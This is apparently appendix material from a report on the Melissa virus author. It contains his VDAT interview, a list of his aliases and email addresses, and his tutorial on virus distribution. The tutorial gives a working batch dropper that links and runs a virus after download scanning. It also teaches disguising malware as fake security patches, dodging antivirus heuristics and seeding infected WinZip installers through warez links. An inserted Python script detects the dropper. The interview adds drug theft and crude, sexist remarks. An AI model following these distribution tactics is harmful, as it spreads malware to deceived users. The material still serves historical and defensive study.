What is your view on Virus Creation software (eg. VCL, PS-MPC etc.)?

I played with NuKE NRLG and PS G2. I thought they were pretty cool. I liked the basic idea behind DREG - I never got a copy of the program (basically never bothered to download it) but I liked the whole philosophy behind it.

What is your view on macro viruses vs. assembly or HLL viruses?

Macro's are cool by me. I think sometimes it's way too easy to create a new variant of a macro but I have seen some that really impressed me. I won't ever write one but that's my preference. HLL virii are the way to go. You can really kick some fucking ass with a C++ virii in 95 - just wait, you will see. I have also heard that someone is working on Microsoft Scripting virii? Kinda like batch virii in 95 .. but I haven't seen anything yet.

Have you ever confirmed one of your viruses 'in-the-wild'?

Too early to tell for me. Though I do have confirmation of 300+ people downloading an infected WinZip of mine. It was a carrier of Skim.Poppy so I suspect that one will do me proud. Hey Joe Wells get used to typing the word "POPPY" :)

Which VX E-zine do you like to most? Which the least?

I like 40 Hex - I re-read them now and again. The best new one is Xine. 29A is also cool.

Which individual or what group do you like/respect in the VX world?

I don't know any. I only respect those that helped me with or without knowing. People like Polt from the WCIVR and Cicatrix also AV'ers like Eugene Kaspersky who answered my questions without bias.

In the AV world?

see above

Which individual or what group do you like/respect outside the VX or the AV world?

I like UPS in warez!! Fuckin' BIG UP'S FELLAZ! I also thought Da Chronic was amazing with AOHell. It's a simple thing now but unheard of when it came out. AOHell was even in Newsweek. New ideas don't need to be complex to gain my respect they just have to work. Da Chronic deserves much credit!

What is your view on destructive payloads in viruses?

Counter productive.

Do you think there is such a thing as a 'good' virus?

All mine are good, I don't understand the question :)

What do you do in 'real' life?

I run the MIS dept. for a large engineering firm (I only run one location though) and I am industrial music artist on the side. You may one day own one of my cd's.

Do people outside the VX scene know what you do (parents, girlfriend etc.)?

Not many - I don't invite people to judge my actions.

Do you do other computer stuff outside VX (Hacking, phreaking, warez etc.)?

I dabble in warez. Fastin.Blee does more warez than I do. He keeps me in the scene.

Should viruses be illegal? Is there a difference between creation and spreading?

I don't think in those terms. I am not governed by other peoples morals. I wouldn't really take any heed in any laws. I would be forced to if it directly affected me but until it does I won't waste time on debating those issues with anyone or myself.

Describe the perfect virus.

I would end up spouting off "the one that was never caught" cliché here so I will pass.

What is your view on Windows (95)

Undiscovered country. Do yourself a favor and buy Andrew Schulman's "Unauthorized Windows 95 Developer's Resource Kit" - I am a big fan of GUI. I started in a text only world and I have no problems seeing it go away.

What is your advice for people just starting out?

I am not a good one for advice. Too selfish and sarcastic to be taken at face value, sorry.

Where can you be reached if at all?

vcru@hotmail.com

Any greets?

Yea shouts out to Klonopin.Jones, Fastin.Blee, Flexoral.DeZego, DeadPete, Mudcat "Grave" Rose, Monkey, Mousey and The Woobie!

Any other comments?

Yes my Turn-On's are skinny little blonde chicks with straight hair, very strong thunderstorms and getting free painkillers. Oh, and one other thing: don't think you can invite me over to your house without me searching your bathroom medicine cabinet for painkillers. I will steal them, you can count on that.

Short responses to the following names or words:
- Dark Avenger - created MtE right? If so then he rules!
- Dark Angel - some virus guy who followed the rules and took a "spooky" name just like all the other sheep. What his accomplishments are I have no idea.
- Sarah Gordon - Isn't she the queen of misinformation? I could be wrong here.
- Fridrik Skulason - AV guy from Iceland
- many fat chicks come from Iceland
- I have seen Björk's tits and she has nasty ones
- ugggh don't go to Iceland
- Alan Solomon - AV guy from DSAV - name makes me think he is fat.
- WordBasic/VBA - cross-platform virii courtesy of Bill Gates
- VDAT - I dig it
- VSUM - loads of mistakes - bad source of information
- Assembler - not a good language for 95 virii
- NuKE - A group who I think are cool
- Phalcon Skism - I really don't know the difference between any of the groups but I think these guys did a good job with G2
- VLAD - I have borrowed some ideas from these ingenious fellows
- I give you credit here and on my website.
- Trident - some poly engine right?
- Polymorphic - waste of time - just don't get detected in the first place
- Stealth - waste of time in 95 - no one uses TBAV in the US anyway so I don't bother to think about stealth
- I hate...... <list too long to print>
- I love...... chocolate ice cream pops from Shop Rite and a 2 liter of Diet Mountain Dew on an empty stomach
- IRC - crap - who wants to chat while they are on a computer anyway - fucking waste of time
- Sex - not as big of a driving force in my life as it seems to be for others but I love to fuck when I get the chance

How and why did you get TNN started?

I told these two other guys (Klonopin.Jones + Fastin.Blee) who were helping me distribute, debug and design virii that they were now in a group and they didn't argue - so The Narkotic Network was born.

How is TNN organized?

Honestly there isn't much to be organized. I just kinda do what I want with it.

How are your other tutorials coming along?

I have mixed feelings on tutorials. I don't deny the fact that I have learned a TON from tutorials but I'm not so sure I am that comfortable giving away all my ideas. I may not write any more tutorials. I have noticed a few errors in my first tutorial anyway and I can't deal with the constant proof reading I do in my head after I post my ideas.

Will you ever release a virus creator?

I don't have that much free time. I divide my free time between programming and music. I have a computer dedicated to the internet and virii and one dedicated to running my samplers, drum machines and synths.

What is in your future and the future of TNN?

I want to turn the Narkotic Network web site into a site where I ask total strangers to send me all the drugs in their medicine cabinet. But, I don't think I can get away with that. I really want to do that but I don't want to risk it all and get caught! I guess we will just keep moving forward with more complex virii and maybe more information. I will probably even relocate when GeoShitties kills the site.

Will TNN increase the number of members?

I don't really know. The Vx culture moves very slowly and seems to communicate very little (I have made attempts to cross pollinate with very little success) so for right now three members is as good as it gets. I also tried to get on #virii once to "hang" but I didn't have my IRC set up to +o super-dork access so no chat for me.

Will TNN go into other scenes except VX? (hacking, etc.)

We actually move a lot of warez. If you're into virii you gotta think about distribution and if we stay up on what's hot then we can infect you when you least expect it!


Appendix 3 Aliases

 David L. Smith

 Common Ground

 VicodinES

a.k.a. Doug Smith dlsmith@monmouth.com


8 posts
drugs, anxiety, klonopin
Peace
D
IIS
Virus-advice
AVP

Nj.test


Doug Winterspoon
Vic@tnn.com
Anexsia ane@tnn.com

Virus Writer
Cicatrix Interview


Cat names
Klonopin Jones
AVP
TNN
VicodinES@my-dejanews.com
16 posts
Vic@Bite-me.org
13 posts
Vic@TNN.com
2 posts
Nj.test

Doug Winterspoon


Nomail@nospam.com
112 posts
alt.comp.virus
alt.comp.virus.source.code
alt.binaries.pictures.erotica.pornstar
nj.test
AVP
12/7/97 message with dlsmith return address

AVP


Cicatrix Interview
Dlsmith

Painfulld@aol.com


29 posts
IIS
Klonopin.jones
TNN
[d]
cats' names

Ibuprofen@my-dejanews.com


7 posts
Doug W
Alt.tv.simpsons
JP Morgan IP
Monmouth IP
Cable and Wireless IP

IIS & Klonopin.Jones

VicodinD@aol.com


12 posts
[d]
IIS
PainfullD -> VicodinD (AOL problems)


Xanax.smith@feedme


13 posts
Virus
TNN Web page link
VIC sig
VicodinES/TNN sig
Drug.lastname combo like Klonopin.Jones


VicodinI@aol.com


2 posts
[d]
IIS


VicodinES@aol.com


36 posts
Peace
Vic
Ft.Lauderdale Bar
Industrial Music
(not IIS though)


Anexsia <ane@tnn.com>


8 posts
Nj.test


Dr Lortab drlortab@aol.com


10 Posts
Rec.music.industrial
IIS
Peace
[d] Opiate


Skyroket skyroket@aol.com


27 Posts
alt.sex and alt.binaries
virus-infected
W97M/Blee.B
Poppy


The VicodinES Theory Of Better File Virus Distribution
(a study in new ideas?)

Ok so you managed to get over your first hurdle, you managed to make/hack/remix a memory resident *.com file infecting virus. Congratulations! I mean that wholeheartedly. So now what? Did you spend all that time learning and debugging .asm files just so it would sit on your HD? No? I didn't think so. So what's your next move? DISTRIBUTION!

The first rule of distribution for a file infector is demand. You must create a demand or use a program that is in demand as a host. Without demand your file will never be downloaded or run.
Second, deception! You must be able to get your virus past most AV products or you will never get a chance to infect. How is your code? Can you sneak by heuristics? You will need a way to sneak your virus past the most common AV programs, even if you're heuristically challenged. Can that be done? Yes, a clever dropper can do that. How? .... read on.
Third, infection! Infect on the first run! This also requires a decently clever dropper. What good is a memory resident *.com infecting virus if it's run and then no .com files are run the entire time it's resident? Then *poof* someone shuts off the computer and never runs your dropper again? That would be fine if you had written a multipartite virus but for this first example we are concentrating on a beginner's virus, a basic *.com memory resident file infector.

Ok so I say that Virus Distribution consists of three basic components:
DEMAND, DECEPTION and INFECTION. Am I right? Is this a sound theory? Well let me back up my theory with an example or two.


EXAMPLE #1:
The Virus: *.com memory resident file infector. (virus.com)
Tools Needed: Tlink, Bat2exe, the virus.obj file (you can find Bat2exe from filez.com if you don't already have it and you must already have Tlink and the .obj file if you wrote the virus!)

Ok so you have everything you need and you're just dying to infect the world. Ok, give it some thought. Think "DEMAND." In this example we will capitalize on a current issue and create demand. In this case we dream up an "AOL IE 3.0 Security Patch" and our method of distribution will be AOL and USENET. You see, I have already done this. When AOL had their big crash I created an Anti-Crash "AOL Approved" Downloadable Patch. You say no one would ever fall for that :) .. yea right! So I just retooled that idea for "right now" - AOL only came out with a patch for their IE integrated browser on 7-7-97 :) .... Anticipate demand, create demand or capitalize on demand. Ok so now everyone who uses AOL will want to be secure, and you have made a program that is in demand. With demand out of the way we need to concentrate on deception. Now, most computer users are not that bright but they know better than to just run a .bat file - hell I have even heard that some computer users even know how to view .bat files and look for suspicious content! So we will hide our .bat file in a .com. (realistically though your chance won't drop that much if you just leave it as a .bat)

Ok let's make that dropper!

1. Rename tlink.exe to patch.exe
2. Rename virus.obj to patch.obj
3. Create a nice descriptive .doc or readme.txt file to calm the user's nerves.
4. Create a .bat file that acts like your file description.
   aol_ie.bat :
   cls
   echo Press any key to update your Internet Explorer For America Online
   pause>nul
   patch /t patch.obj ;link the virus
   patch ;run the virus
   command ;call command.com for infection
5. bat2exe your aol_ie.bat - it will result in aol_ie.com [you can skip this part if you have to]
6. Package your files into a nice .zip or if you want you can use a self extracting compression program but use one with an icon!! (WinZip or RAR) [icons calm new computer user's nerves!]

So your zip will contain :
patch.exe [why did you rename tlink.exe? patch goes with the flow better than tlink.exe and will not arouse suspicion]
patch.obj [why did you rename virus.obj? also goes with the flow better]
aol_ie.com [the dropper .bat converted to .com]
readme.txt [be creative here!!]

*** [EXTRA] Take it a bit further! ... If you want to you can add a few extra steps like creating a .pif for your .com [or .bat] or by including a hidden .ico or .dll file to go along with your .pif ... use your imagination ***

*** [EXTRA] Take it a bit further! ... You can also fatten up your zip with miscellaneous files of varying size renamed to patch.dat or something equally innocuous ***

*** [Snag?] Did we hit a snag? ... What if they view these files with a hex editor or text editor? No problem - all they will see is the inside of tlink.exe or some commands in aol_ie.com like patch and pause, certainly nothing to be alarmed about :) ***

So is the deception complete? More than you may realize. They downloaded your zip and scanned it. They did a deep or heuristic scan!!! Are you worried? Should you worry because your virus is heuristically challenged? Not really - you have a 75% better chance of beating heuristics in .obj form :) ... don't believe me? Test that one yourself. Also your aol_ie.com has the pause command in it. What virus pauses before it infects? Do you know of one? It doesn't make logical sense ... that's why we do it.

Finally, we need instant infection. Wait, that's already done. Did you catch it? The third to last line in our bat links the viral code and creates the actual virus. The second to last line runs our virus which, in turn, goes memory resident. Then the last line of our very simple dropper runs command.com. We just went memory resident and then got command.com! Hell that means that even if our user has Win95 we still get a chance to go active every time they invoke a DOS Prompt or Shut Down To DOS. Also our heuristically challenged virus wasn't even created until after the download was scanned and no current AV programs (that I know of) support heuristics in their memory resident scanner!

So in example #1 I demonstrated how some thought and ingenuity combined with my theory of "Better Distribution" can increase your chances of infecting a new machine and spreading. Example #1 only deals with a very simple virus and limited targets (how many .com files can you find on your system?) ... but our mission was to increase the chances of infection and survival and we did that 10 fold!!
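A defender-side check for the dropper shape VicodinES describes in example #1 (an object file linked on the victim's machine, the result run, then command.com invoked), written here as an added example that is not part of the ICSA report or of VicodinES's text; the two sample batch inputs and the scan_batch_dropper function are constructed for this illustration.

```python
import re

# Constructed sample inputs (not taken from any real archive): the aol_ie.bat
# dropper quoted in the text above, with its wrapped line joined, and a
# harmless install script for comparison.
DROPPER_BAT = """cls
echo Press any key to update your Internet Explorer For America Online
pause>nul
patch /t patch.obj ;link the virus
patch ;run the virus
command ;call command.com for infection
"""
BENIGN_BAT = """@echo off
echo Copying files...
copy setup.dat c:\\app\\setup.dat
pause
"""

OBJ_FILE = re.compile(r"^(?P<base>[^\\/:\s]+)\.obj$", re.IGNORECASE)
SHELL = re.compile(r"^(command|command\.com|cmd|cmd\.exe)$", re.IGNORECASE)


def _tokens(line):
    # DOS batch has no ';' comment syntax; the quoted dropper's ';...' notes
    # would just be extra arguments, so drop them before tokenising.
    return line.split(";", 1)[0].split()


def scan_batch_dropper(text):
    """Flag the link-then-run-then-shell pattern from the text above.

    Signals: (1) an .obj file handed to some program at run time, so the
    executable only comes into being after any download-time scan; (2) a
    later bare invocation of the base name that link step would produce;
    (3) a command shell spawned afterwards.  A 'pause' before the link step
    is noted as a decoy.  Two or more signals mark the file as suspicious."""
    findings, linked, paused_before = [], {}, False   # linked: base -> line
    for no, raw in enumerate(text.splitlines(), 1):
        toks = _tokens(raw)
        if not toks:
            continue
        cmd = toks[0].lower().split(">")[0]      # 'pause>nul' -> 'pause'
        if cmd == "pause" and not linked:
            paused_before = True
        objs = [t for t in toks[1:] if OBJ_FILE.match(t)]
        for t in objs:
            linked[OBJ_FILE.match(t).group("base").lower()] = no
            findings.append(f"line {no}: object file {t} linked at run time by '{cmd}'")
        base = re.sub(r"\.(exe|com)$", "", cmd)
        if not objs and base in linked:
            findings.append(f"line {no}: runs '{cmd}', the program built on line {linked[base]}")
        if SHELL.match(cmd) and linked:
            findings.append(f"line {no}: spawns a command shell after the payload")
    if findings and paused_before:
        findings.append("'pause' before the link step: user-interaction decoy")
    return {"suspicious": len(findings) >= 2, "findings": findings}
```

The same check applies to a .bat recovered from a bat2exe-style .com, since the original command lines survive inside it as plain text (the text above makes that point itself).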

Ok, do you subscribe to my theory of Better Distribution yet? No? I'll try once again with a more complex virus and a totally different angle, but sticking to the main points of my theory : DEMAND, DECEPTION and INFECTION!



EXAMPLE #2:
The Virus: *.exe (Windows EXE) non-memory resident file infector. (virus.exe)
Tools Needed: A current or new beta release of a popular Windows program.

Ok let's start! Mission number one? DEMAND! For this example let's use the latest greatest release of WinZip (beta or otherwise). That should take care of demand - everyone wants a new FREE version of WinZip. It's a good universal program to use just like pkzip was a few years ago.

As you just saw demand takes care of itself if you just put a little thought into it. Let's see if DECEPTION will do the same thing. How do you infect WinZip? Well, since this is a more advanced example I will just assume that I don't have to show you how to infect a file. But, I will tell you to test your work! Think! The WinZip setup program is a lot more complex than any dropper .bat file we can construct so be sure to test your infection. For example I have done the WinZip thing and the Setup.exe for the 16bit WinZip has to have the exact same time/date stamp as the readme.txt. You may have made a successful infection but your deception will fail if the infected program screams that time/date stamps don't match! So with the more complex programs deception takes a bit more thought. Does the deception end here? No. How will you distribute this virus in a deceptive way? If you follow the normal route of distribution for a new virus that is attached to a new ware then you would just post the zip to alt.binaries.warez and all other warez-related newsgroups. Well, that's great but Dr Solly scans most binary newsgroups and posts virus alerts and instant fixes. So in one day you can be found, named and have a remover. That is the worst thing that could ever happen to a new virus! So what's there to do? Well either scam some warez web sites or warez traders into taking your file if it's legit (but infected) or do what I do/did and post to all those USENET warez related newsgroups with a LINK to some hacked out ftp or web site where the file is stored!! No one bothers to follow all warez links and scan them. Shit, I did this for one of my files and hid a counter on the site ... it reached 553 before Geocities threw me off for distributing registered software. Now think about that - I took a new, not named and currently unscannable virus and had 500+ people seek it out (and run it?). For deceptive distribution that was a slam-dunk!

Ok now how did my INFECTION take care of itself? I chose a setup.exe!!! You have to choose your carriers wisely. A setup program usually runs all over and infects the program that it is setting up, in this case WinZip. Plus, WinZip is an often used program which greatly increases your chances of survival and any self extracting archives will be carriers of my virus!

Are you now convinced that my "Theory of Better Distribution" is the way to attack your next world wide virus infection? I hope so.

Boot sector virii don't have to rule the world of distribution (and the Wild List!) - think hard and you will figure out new and ingenious ways to make someone want your virus. I hope that I have made you think a bit harder about what you're going to do the next time that you decide to distribute one of your virii. Hopefully you will never again just upload some "new patch" for some obscure program to a local BBS and pray that your virus makes it around the world. If this was 1989 then you may have had a chance but remember that you have to think about now. Also, don't think you can just upload sex.exe to alt.binaries.erotica. Few people are stupid enough to run an .exe from a porn newsgroup (though I believe some are - just not enough of them to count).

Once again remember you have to think about now, don't take into account how they used to do it! Think about how you can do it now! How do you get files now? What programs do you want now? What makes you suspicious now?

Remember unless you still want to live that "I just write virii for research" lie then you need to think as hard about your distribution as you did on making your multipartite encrypted armored polymorphic stealth tunneling memory resident Windows 95 virus!!!

Peace,
VicodinES

Ps. I also recommend you get the Nowhere Utilities by Nowhere Man! Fucking great tools for deception!

[text content edited by Commander Ritalin and Fastin.Blee]


CERT Advisory 99-04, Melissa Macro Virus http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html (Appendix 1)

VDAT Cicatrix interview of VicodinES (Appendix 2)

Last Modified: 12/09/99 12:50